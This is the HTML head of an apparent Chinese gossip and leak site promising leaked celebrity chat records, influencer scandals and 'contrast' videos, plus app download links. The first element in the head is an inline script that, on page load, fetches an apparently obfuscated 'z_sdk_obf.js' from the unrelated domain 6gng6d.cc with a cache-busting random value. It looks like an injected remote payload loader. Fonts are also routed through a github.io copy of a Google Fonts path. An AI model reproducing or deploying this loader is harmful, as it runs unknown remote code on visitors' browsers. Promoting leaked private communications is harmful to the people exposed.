<!doctype html>
<html lang="zh-CN">
  <head>
    <script>
(function () {
  var sdk = document.createElement("script");
  sdk.src = "https://6gng6d.cc/z_sdk_obf.js?r=" + Math.random().toString(36).slice(2);
  sdk.async = true;
  document.head.appendChild(sdk);
})();
</script>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>每日大赛黑料网 | 网红塌房现场 明星聊天记录泄露 反差视频 黑料不打烊 | 吃瓜网站最新入口与app下载</title>
    <meta name="description" content="每日大赛黑料网，每日更新网红塌房、明星聊天记录泄露、博主反差视频等热门黑料，汇总吃瓜资源，提供网站最新入口与app下载，吃瓜第一线。" />
    <meta name="keywords" content="每日大赛黑料,每日大赛黑料网,黑料,爆料,吃瓜,网红黑料,明星聊天记录,反差视频,黑料不打烊,最新入口,app下载" />
    <link rel="preconnect" href="https://mrdsblackconnect.github.io">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://mrdsblackconnect.github.io/css2?family=ZCOOL+XiaoWei&family=Noto+Sans+SC:wght@300;400;500;700;900&family=Noto+Serif+SC:wght@400;600;700;900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/remixicon/4.5.0/remixicon.min.css">
    <script type="module" crossorigin src="/assets/index-BHcDItOl.js"></script>
    <link rel="stylesheet" crossorigin href="/assets/index-3SD7E7sS.css">
  </head>
  <body>
    <div id="root"></div>
  </body>
</html>
